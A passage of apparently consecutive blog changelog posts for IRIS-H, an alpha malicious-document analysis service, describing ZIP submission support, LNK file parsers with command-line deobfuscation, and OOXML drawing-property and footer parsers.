<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API, UI</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API side code logic has been added to allow submitting ZIPed files. Industry standard password '<b>infected</b>' is supported. UI side 'Submission' and 'About' pages have been updated to reflect the new changes.</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>Known Issues</b>: ZIP files created with Ubuntu 'Archive Manager' throw an error.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white; font-size: 13px;">The code logic has been added to IRIS-H to allow handling file extraction from ZIP archive files. The 'Submission' page will now accept ZIP file upload and perform the following operations with it:</span></span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify if the file is a Microsoft Office document in OOXML format</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify the number of files in the archive</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify if the password is set</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify the unpacked size of the compressed file contained in the archive</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify if the archive file is 'nested'</span></span></li>
</ul>
<br />
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white; font-size: 13px;">The following restrictions and limitations are applied:</span></span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ZIP file must contain a single file</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">if ZIP file password is enabled it must be set to '<b>infected</b>'</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">unpacked size </span></span>of the compressed file contained in the archive must not exceed 10MB</li>
<li>ZIP 'nesting' must not exceed 2 levels (ZIP-in-a-ZIP)</li>
<li>ZIP file size must not exceed 4MB*</li>
</ul>
<div>
<i>* 4MB ZIP file size limit is enforced by the underlying technology employed to handle the file extraction. More on this in the following section.</i></div>
<div>
<br /></div>
<div>
<b><span style="color: #3d85c6;">What's under the hood?</span></b></div>
<div>
<br /></div>
<div>
<u>Disclaimer</u>: The choice of the technology used to implement ZIP files support was mainly driven by a will to learn it. Another contributing factor though is the lack of good NodeJS libraries that provide password protected ZIP files handling.</div>
<div>
<br /></div>
<div>
IRIS-H API and UI components are written in different flavours of JavaScript. Originally, I was looking to implement ZIP files support using a JS library, but to my surprise I couldn't find the one with proper support for different compression and encryption types. I realized it would have to be implemented in a different programming language, but the integration with the rest of the service and its infrastructure seemed challenging until I decided to look into using AWS Lambda.</div>
<div>
<br /></div>
<div>
<a href="https://aws.amazon.com/lambda/" rel="nofollow" target="_blank">AWS Lambda</a> supports a number of programming languages including C# with .NET Core 2.0. This opens up a good number of possible solutions. The choice stopped with <a href="https://github.com/icsharpcode/SharpZipLib" rel="nofollow" target="_blank">SharpZipLib</a>. This library supports most of the compression and encryption methods. Building an AWS Lambda function turned out to be a rather easy task. The most challenging part was dealing with the '<a href="https://docs.aws.amazon.com/lambda/latest/dg/limits.html" rel="nofollow" target="_blank">RequestResponse</a>' size limitations enforced by '<a href="https://docs.aws.amazon.com/lambda/latest/dg/API_Invoke.html" rel="nofollow" target="_blank">Invoke</a>' function. The only solution I could find was to apply the ZIP file size limit at the submission time. It's currently set to 4 MB due to the lambda's set limit of 6 MB. 2 MB difference goes toward 'base64' conversion the submitted ZIP file is a subject to when sent to the lambda function. </div>
<div>
<br /></div>
<div>
Testing it with ZIP files of different sizes shows that it takes about 10 seconds on average to process a 4 MB ZIP file. Those under 1 MB are processed almost with no delay.</div>
<div>
<br /></div>
<div>
Like the rest of the service, this new feature is experimental and requires more thorough testing. I'd appreciate any feedback.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-42350880284665482352017-12-10T21:49:00.000+00:002017-12-10T21:49:43.083+00:00IRIS-H (alpha): Added LNK files "Console Data Block" structure parser<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: feature update</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: API</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: Parser for LNK files </span><span style="color: #666666; font-family: trebuchet ms, trebuchet, sans-serif;"><span style="font-size: 13px;">"Console Data Block" structure </span></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">has been added. The parser will attempt to extract all relevant data stored in </span><span style="color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">"Console Data Block" structures.</span><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;"> The information about Console Window is stored in these structures.</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: None</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">IRIS-H </span><span style="background-color: white; color: #666666; font-family: "open sans", "helvetica neue", helvetica, arial, sans-serif; font-size: 14px;">Shell Link (.</span><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">LNK) file parser has been updated to include data extraction routine for </span><span style="color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">"Console Data Block" <a href="https://msdn.microsoft.com/en-us/library/dd891381.aspx" rel="nofollow" target="_blank">structures</a>. </span><span style="color: #2a2a2a; font-family: "Segoe UI", "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 13px;">The ConsoleDataBlock structure specifies the display settings to use when a</span> link target<span style="color: #2a2a2a; font-family: "Segoe UI", "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 13px;"> specifies an application that is run in a console window. Below are just some examples of data stored in these structures:</span><br />
<br />
<ul>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">foreground and background text colors in the console window.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">foreground and background text color in the console window popup.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">console window buffer size.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">console window size.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">console window origins coordinates.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">font information.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">cursor information.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">edit settings.</span></span></li>
</ul>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">Below screenshot show an example of "Console Data Block" data extracted by IRIS-H.</span></span></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL_zfwzpeVYSZaLog3zMeo0ABzpFR9pI-nKVytajhKQh0cI6q28dM1-3vxlGHzIx6ExCN__2D70nAj4uZgOO2nrPuEkoPZMTLTa2CbF3KXqM9DoBj_MsS8zVL5GMYRjqbHJV9m7qd-ZjYe/s1600/console_parser_output.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="911" data-original-width="600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL_zfwzpeVYSZaLog3zMeo0ABzpFR9pI-nKVytajhKQh0cI6q28dM1-3vxlGHzIx6ExCN__2D70nAj4uZgOO2nrPuEkoPZMTLTa2CbF3KXqM9DoBj_MsS8zVL5GMYRjqbHJV9m7qd-ZjYe/s1600/console_parser_output.PNG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H report showing "Console Data Block" data</td></tr>
</tbody></table>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">Full report can be found here - <a href="https://iris-h.services/report/dffa7c38201c92b1037d908addb0295e" rel="nofollow" target="_blank">https://iris-h.services/report/dffa7c38201c92b1037d908addb0295e</a></span></span></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<br /></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-60082989269110695952017-11-27T22:13:00.000+00:002017-11-27T22:14:00.314+00:00IRIS-H (alpha): Updated LNK file parser / Command line arguments deobfuscation added<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: feature update</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API & UI (clear browser cache for '</span><span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>iris-h.service</b></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">' to see the changes)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Parser for LNK files has been updated. Command line arguments string deobfuscation and URL extraction code have been added. UI Report page has been updated to display the new data.</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">IRIS-H </span></span><span style="background-color: white; color: #666666; font-family: "open sans" , "helvetica neue" , "helvetica" , "arial" , sans-serif; font-size: 14px;">Shell Link (.</span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">LNK) file parser has been updated and now attempts to deobfuscate the command line arguments string. When the command line arguments string is present, the service will attempt the following:</span><br />
<br />
<ul>
<li>detect environment variables assignments with '<b><span style="color: #3d85c6;">set</span></b>' command</li>
<li>detect environment variables usage with ' <b><span style="color: #3d85c6;">! </span></b>' and ' <b><span style="color: #3d85c6;">% </span></b>' special characters</li>
<li>replace referenced environment variables with their corresponding values</li>
<li>remove escaping characters ' <b><span style="color: #3d85c6;">^ </span></b>' and ' <b><span style="color: #3d85c6;">` </span></b>'</li>
<li>detect and extract URL strings</li>
<li>detect string concatenation operations and perform them</li>
</ul>
<div>
<br /></div>
<div>
Below is a report example showing the new feature in action.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCnvImWMMe1w0NNKFsRnTf6edjTTjhepdDL1usOhyphenhyphenGNpfsFz9Cm_fqzhyzhRhN-M7jXMg8D1dqfJ4yTBXElWxTASbPFCGfRLnP97gHVu82CMK0XvlnuigvXYeVf6YbqSRzCyafldr84y0N/s1600/report_example1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="729" data-original-width="622" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCnvImWMMe1w0NNKFsRnTf6edjTTjhepdDL1usOhyphenhyphenGNpfsFz9Cm_fqzhyzhRhN-M7jXMg8D1dqfJ4yTBXElWxTASbPFCGfRLnP97gHVu82CMK0XvlnuigvXYeVf6YbqSRzCyafldr84y0N/s320/report_example1.PNG" width="273" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LNK file analysis results showing deobfuscated command line arguments string and extracted URL</td></tr>
</tbody></table>
<div>
Corresponding report - <a href="https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c" rel="nofollow" target="_blank">https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c</a></div>
<div>
<br /></div>
<div>
More examples can be found here:</div>
<div>
<a href="https://iris-h.services/report/166127261e36b959e48eece2c1b26185" rel="nofollow" target="_blank">https://iris-h.services/report/166127261e36b959e48eece2c1b26185</a></div>
<div>
<a href="https://iris-h.services/report/2de846108b26101e3554f5964c1a3576" rel="nofollow" target="_blank">https://iris-h.services/report/2de846108b26101e3554f5964c1a3576</a></div>
<div>
<br /></div>
<div>
<u><b>NOTE</b></u><br />
IRIS-H UI changes might require your Internet browser cache clean up for <b><span style="color: #3d85c6;">iris-h.services</span></b> website to take effect.<br />
<br />
<br />
<br /></div>
<div>
<br /></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-26990353915764712702017-11-16T23:01:00.000+00:002017-11-16T23:03:29.960+00:00IRIS-H (alpha): Updated OOXML 'document' file parser<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: feature update</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: OOXML 'document' file parser has been updated to detect and extract "</span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">Drawing Object Non-Visual Properties</span></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">".</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>Example</b>: <a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" style="color: #ff9900;" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a></span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white; font-size: 13px;">"</span><span style="font-size: 13px;">Drawing Object Non-Visual Properties(docPr) element specifies non-visual object properties for the parent DrawingML object. These properties are </span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">specified as child elements of '</span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>docPr</b></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">' element.</span></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">" - </span><span style="background-color: white;"><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ECMA-376 Part 1 (section 20.4.2.5)</span></span></span><br />
<span style="background-color: white;"><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="background-color: white;"><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">OOXML '<b>document</b>' file parser has been updated to extract </span></span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">non-visual object properties associated with inline drawing objects(pictures). The extracted data will be displayed in the corresponding '<b>document</b>' panel under '<b>Individual Components</b>' section on the report page. The following properties will be considered:</span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><b>descr</b> - </span></span>Specifies alternative text for the current DrawingML object, for use by assistive technologies or applications which do not display the current object.</li>
<li><b>hidden </b>- Specifies whether this DrawingML object is displayed. When a DrawingML object is displayed within a document, that object can be hidden (i.e., present, but not visible).</li>
<li><b>name </b>- Specifies the name of the object. Typically, this is used to store the original file name of a picture object.</li>
<li><b>title </b>- Specifies the title (caption) of the current DrawingML object.</li>
</ul>
<br />
Some of the above properties might be omitted from the property set. IRIS-H will only extract and display properties present in the set. See below for an example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBrtYIppS219BOupoNR5WkvWZIfbeLiM-5rhso0qICc0Jbv5fHjGxDKpnIDAxb0dAaCnHVZJscliEMu-s7B4PBpKOzA0gt4FgHccR7m7FrEAJtIfqq1NF8AwpFFhemVwat_tIJWOjpgq/s1600/non-visual_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="224" data-original-width="623" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBrtYIppS219BOupoNR5WkvWZIfbeLiM-5rhso0qICc0Jbv5fHjGxDKpnIDAxb0dAaCnHVZJscliEMu-s7B4PBpKOzA0gt4FgHccR7m7FrEAJtIfqq1NF8AwpFFhemVwat_tIJWOjpgq/s320/non-visual_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'document' panel showing non-visual object properties extracted from inline drawing object</td></tr>
</tbody></table>
<br />
As seen in the screenshot above, these properties might contain digital artifacts that can be helpful in a digital forensics investigation.<br />
<br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">Full report for the example above can be found here - </span><a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" style="background-color: white; color: #b87209; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px; text-decoration-line: none;" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a><br />
<br />
<br />
<br />
<br />Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-69926688165271661062017-11-16T22:22:00.000+00:002017-11-16T23:02:31.593+00:00IRIS-H (alpha): Added OOXML 'Footer Part' parser<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Parser for OOXML "Footer Part" has been added. The parser detects and extracts text content including special field characters.</span><br />
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><b>Example</b>: <a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a></span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
